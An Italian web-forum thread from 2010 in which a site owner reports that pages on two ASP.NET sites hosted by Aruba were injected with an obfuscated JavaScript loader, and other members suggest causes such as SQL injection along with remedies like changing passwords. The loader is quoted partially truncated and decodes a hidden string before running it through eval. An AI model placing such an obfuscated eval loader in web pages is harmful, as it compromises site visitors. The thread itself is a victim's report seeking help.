Presunto attacco su server Aruba

giovedì 18 marzo 2010 - 20.00

andrestu Profilo | Expert

Salve a tutti,
qualche giorno fà è successa una cosa strana, praticamente su due siti aspnet che gestisco mi sono ritrovato in uno il file default.aspx modificato e nell'altro il file home.aspx modificato con il seguente tag:

<script language="javascript">function t(){return z($a);}var $a="Z73tZ3dZ2... ...rZ69Z6eZ67()Z3b}Z3b";function z(s){r="";for(i=0;i<s.length;i++){if(s.charAt(i)=="Z"){s1="%"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}var x=0;eval(t());</script>
ho messo i puntini in mezzo per abbrevviare il contenuto.

Premetto che sono su Aruba...
Il problema è che dopo aver ripristinato le rispettive pagine oggi su una delle due mi si è ripresentato il problema. Penso a sto punto che sia dovuto a qualche tipo di attacco, è successo anche a qualcuno di voi?

Avete idee in merito?

Potrebbe essere che mi abbiano "fregato" le pass ftp, come si può utilizzare l'ftp in modo sicuro?

FrancescoGuadagno Profilo | Senior Member

L'attacco che hai subito non è necessariamente effettuato mediante furto di password, anzi lo escluderei. Avendo le credenziali FTP credo che avrebbero potuto fare di più . Prova a fare qualche ricerca su temi come "SQL injection" o "Javascript injection". Scoprirai quanto sia facile essere vittime, specie se non si utilizzano certe precauzioni.

Gho5t Profilo | Junior Member

quoto FrancescoGuadagno... non è necessario che ti abbiano rubato le password dell'FTP... però ora che te ne sei accorto ti conviene comunque cambiare tutte le password per sicurezza... per il resto cerca di capire come hanno fatto e quale vulnerabilità/pagina hanno sfruttato... altrimenti è molto probabile che rientreranno (non so se su Aruba c'è la possibilità di vedere i log)...

andrestu Profilo | Expert

Il punto è che è stata modificata in qualche modo la pagina in questione, e dubito che la modifica possa avvenire da browser dal momento che aspnet dovrebbe bloccare la ricezione di tag <script....script>. Oltretutto i file che sono sotto la radice principale (a parte qualche cartella specifica) sono protetti dalle autorizzazioni del file system. Dunque o mi hanno furtivamente rubato la password tramite ftp oppure la cosa è dovuta a qualche attacco di massa lato server, anche perchè il problema si è presentato in uguale modo su domini diversi. Ovviamente ho chiesto il cambio password e ora proverò ad usare Ftp con SSL magari è più sicura la cosa, bisogna vedere però se Aruba lo supporta...
Pensate che ieri ho aperto una chiamata su Aruba per quanto riguarda sto problema e sapete cosa mi hanno risposto: "provi a resettare la cache del browser..."
HAAAAAAA ha ha ha haaaaaaa cazzo cazzo cazzo almeno non prendete x il c... dico io!!!!

Comunque eliminando il problema all'origine (visto che leggendo qui e là ho qualche dubbio sulla sicurezza dei loro sistemi) avete da consigliarmi qualche fornitore di servizi Hosting per Aspnet e Sql possibilmente italiano o anche straniere ma non molto lontano che sia valido?

Gho5t Profilo | Junior Member

in Italia il più valido che conosco è proprio aruba... xd
altri non ne conosco sorry...
Partecipa anche tu! Registrati!
Hai bisogno di aiuto ?
Perchè non ti registri subito?

Dopo esserti registrato potrai chiedere
aiuto sul nostro Forum oppure aiutare gli altri

Consulta le Stanze disponibili.

Registrati ora !
Copyright © dotNetHell.it 2002-2017
Running on Windows Server 2008 R2 Standard, SQL Server 2012 & ASP.NET 3.5